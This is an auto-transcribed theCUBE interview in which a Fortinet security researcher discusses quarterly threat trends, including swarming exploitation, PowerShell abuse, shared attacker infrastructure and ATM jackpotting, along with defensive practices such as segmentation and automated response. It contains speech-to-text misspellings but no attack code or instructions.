from our studios in the heart of Silicon Valley Palo Alto California this is a cute conversation welcome to the cube studios for another cube conversation where we go in-depth with thought leaders driving business outcomes with technology I'm your host Peter Burris every Enterprise that is trying to do digital transformation finds themselves facing two challenges one their digital assets themselves are a source of value and to other assets that are sources of value are becoming increasingly digitized and that creates a lot of challenges a lot of security concerns that bad agents out in the internet are exploiting and requires a programmatic fundamental response to try to ensure that the digital assets or digitized assets aren't mucked with by bad guys so to have that conversation we're here with Tony Jian Domenico Tony's a senior security strategist and a researcher and the CTI lead at Ford NIT Tony welcome back to the cube hey Pete it's great to be here man so as you get to see you yeah well we've been doing this for a couple of years now Tony and so let's get just kick it off what's new so what's new should we start talking about a little bit about the index here what we saw with the overall threat landscape sure well cool so you know y'all like you know like we always do we always like to start off with an overall threat landscape at least they give an overview of what that index looks like and it really consists of malware botnets application exploits and what we looked at over the quarter there was a lot of volatility throughout the quarter but at the end of the day it ended up only 1% higher than the quarter before now some of that volatility really is being driven by what we've talked about a lot of times Peter and a lot of these other episodes is that swarm like activity whenever an actual vulnerability is successfully exploited by an adversary everybody swarms in on that vulnerability and our fertig are labs you see that really like super spike up a great example of that would be in the last year in December think PHP which is an application that's a framework to rapidly develop web apps they had a vulnerability that if you successfully exploited it it would give you remote the remote access or I'm sorry remote code execution and they were exploiting that and we definitely seen a huge uptick now that wasn't the only one for the quarter but that and along with some of the other ones it's really what's kind of driving on volume so the index has been around for a few quarters now and it's a phenomenal way for folks out there to observe how overall trends are evolving but as you said one of the key things that's being discovered is that or you're discovering as you do this research is this notion of swarming it seems as though there ought to be a couple of reasons why that's the case Tony it's it's we've talked about this in the past there's folks who want to get a little bit more creative in creating bad stuff and there's other folks who just want to keep the cost low and just leverage what's out there which approach are the bad guys tend to using more and or is there an approach one of the other approach is more targeted to one or another kind of attack well it's funny you usually see the folks in the cyber crime ecosystem that are really focusing on you know identifying them not so much where they're doing more sort of targeted attacks it's more of a you know pray and spray you know type of thing and you see a lot of that you know anytime they can hire you can get a life of cybercrime right in the leverage some of these common you know you know services you have code reuse you know which is out there so you have that sort of like group there right and then you have more of the you know more of the you know hands-on sort of keyboard the more you know targeted attacks that are really focused on specific you know victims so you have those you know those two groups I say now with that though there kind of is a commonality there where there's this concept and it's nothing new we've been talking about this for years in the cybersecurity industry it's living off the land right where once a victim is on the actual machine itself they start leveraging some of the tools that are already available there and usually these tools their administration tools to be able to minister the actual network but these tools can also be used in the farías ways from example here would be you know PowerShell they you know a lot of admins use PowerShell for efficiencies on the network but that also can be used in the forest ways and the bad guys are using that and then this past quarter you know we did see a lot of PowerShell activity now you know Peter having said that though I think as a whole with the security community we're getting better at being able to identify these types of PowerShell attacks one we got better technology on the endpoint and I think to Microsoft is in a better job of being able to provide us more hardening capabilities for PowerShell like being able to restrict access to PowerShell as well as giving us better logging capability to be able to identify that malicious activity so we are getting better and the bad guys know this so I think what we can probably look for in the future is them leveraging either a different interface or different language because all they really need to do is interface with that dotnet framework which is part of a Windows system and they can start doing the same exact things they were doing with PowerShell and we're seeing that it in the open-source community now things like Silent Trinity open source tool that allows you to do those same things so for C an open source pretty much guarantee we're gonna see it out there in the wild here soon so we've got a group of bad actors that are using this living off the land approach to leverage technology that's out there and we've still got kind of the big guys having to worry about being targeted because you know that's how you make a lot of money if you're successful but it certainly does sound is that a general business practice for a lot of these guys is to leverage common infrastructure and that this common infrastructure is increasingly becoming you know better understood have I got that right no I you know Peter you're spot-on here what we did we did some exploratory research in this last quarter and what we found out is with the exploits within that quarter or or or the axe will come threats sixty percent of those threats are using the same infrastructure what I mean by infrastructure you know I I mean things like you know infrastructure to download malware maybe to redirect you to some other site and then downloads malware and that makes a lot of sense Peter you know why because in this cybercrime ecosystem if you didn't realize this it's a vicious competitive market everybody is trying to sell their wares and they want to make sure that their service is the best it's better than someone else's and they want to make sure that it's stable so they find these you know community you know infrastructures that are tried-and-true you know some of them are from you know bulletproof hosting so you know services you know things of that nature so you see a lot of the folks in a cybercrime ecosystem using them now on the flip side though you definitely see some of the thread actors that are more sort of you know more the advanced threat actors maybe what they want to do is hide a little bit so they'll hide in that larger community to be able to possibly be able to bypass that that attribution back to them because they don't want to be sort of labeled with oh hey this particular thread actor always uses this infrastructure so if they can blend in a lot harder to find them so they can use what is available but at the same time differentiate themselves in this bad actor ecosystem to take on even more challenging the potentially lucrative exploits now tell me if we know something about this common infrastructure as you said sixty percent of these attacks are using this common infrastructure that suggests we can bring a common set of analysis frameworks to bear as we consider who these actors are and what their practices are have I got that right yeah yeah absolutely if you can align your PlayBook defenses with the offensive actual playbook that the threat actors are using they're better off you're gonna be right because then you can be able to combat them a lot better and as a matter of fact I mean we've kind of introduced this sort of concept in conjunction with our our partnership with the cyber threat Alliance we're actually producing these thread actor play books you know and what we're doing is the idea behind this is if we can identify the malicious activity the threat actors are actually doing to complete their cyber mission expose some of them tactics those techniques those procedures we could possibly disrupt some of that malicious activity and you know this past this past quarter here we focused on a group you know Peter called the the silence group and they're really focused on identifying and stealing financial data they're looking at banks banking infrastructure and ATM machines and you'll get a kick out of this with the ATM machines they're doing something called jackpot II where they if they can find the axle software behind the ATM machine find that ATM process they can inject a malicious DLL into that process giving them total control over the ATM machine and now they can dispense money at will and they can have these money mules on the other side receive that actual money so you know we have a lot of different campaigns in play books that we've identified on our website and that once we understand that we align that with our security fabric and ensure that our customers are protected against that particular playbook Tony I'm not happy to hear that so this is this is my distressed face that I use during these types of interviews but it's if if we're able to look at how bad guy play books are operating then we ought to be able to say and what are those fundamentals that a shop should be using the security professionals should be using that are just you know so basic and so consistent and it seems that are you guys have identified three to do a better job of taking a fabric approach that starts to weave together all assets into a more common security framework to to do a better job of micro and macro segmentation so that you can identify where problems are and then finally increase your overall use of automation with AI and m/l how is this translating into your working with customers as they try to look at these playbooks and apply their own playbooks for how they set up their response regimes yeah so I mean I think overall I mean I think you can hit it on the head computer you kind of nailed down really those some it was kind of fundamental sort of concepts here now you can identify and you can document as many playbooks as you want but if you're not able to quickly respond when you identify those actual playbooks you know that's really half the battle I mean if you need to be able to identify you know one not only when the threat actors in your environment but then also you need to be able to quickly you know take action and like you were saying with that fabric if we can have that actual fabric being able to talk to the other controls within that fabric and take some action they're better off you're gonna be because you can align your defenses there and that's a great would you gotta make sure that all the controls within that fabric are all communicating together they're working together they're sharing information and they're responding together sure enough yeah are you starting to advise customers I'm curious you advising customers that even as they increase the capabilities of their fabric and how they handle their architectures from a micro macro segmentation and increase their use of automation or are there things that they can do from a practice standpoint just to ensure that their responses are appropriate fast and accurate yeah sure sure I mean I think a lot of the actual fabric once you actually build that fabric there's certain you know playbook responses that you can program into that fabric and I'll also even go I know we talked about you know fundamentals but I'll even dive a little bit lower here and you know you have that fabric but you also have to make sure you understand all the assets you have in your in you know your environment because that that information and that knowledge helps you with that macro and micro segmentation because when you can isolate you know different areas if there is a certain area that gets infected you can quickly turn the knobs to isolate that particular threat and that specific you know area or that's a specific segmented area and that is really gonna allow you to fight through the attack give you more time and ultimately reduce the impact of that particular breach so Tony we got the summer months coming up that means more vacations which is you jest less activity but then we got summer interns coming in which you know may involve additional clicking on things that shouldn't be clicked on any ideas what what should security pros be thinking about in the summer months what's the trend show well I think we're gonna continue to see that you know I I think the same type of threats that we've seen in the first quarter but I would say you know there may be a slight sort of drop-off right we got kind of kids that are gonna be out on vacation so you know schools may not see as much activity you got you know folks gonna be taking vacations and at the end of the day most of these exploits are client-side exploits which means you know a lot of times you need somebody to do something on the actual computer either you know clicking that link or clicking the attachment and if they're not there to do that they'll just sit there and you'll see less activity over time so we might see a little reduction in volume but I still think we'll see very similar types of you know threats in the coming months so good time good time are a good opportunity for security pros to double down on putting in place new architecture practices and response regime so that when stuff kicks up in the fall they're that much more prepared da Tony G on Domenico fort Ned great once again thanks very much for being on the cube hey you know Peter it's always a pleasure being here man hope to see you again soon you will and once again I'm Peter Burroughs until next time [Music]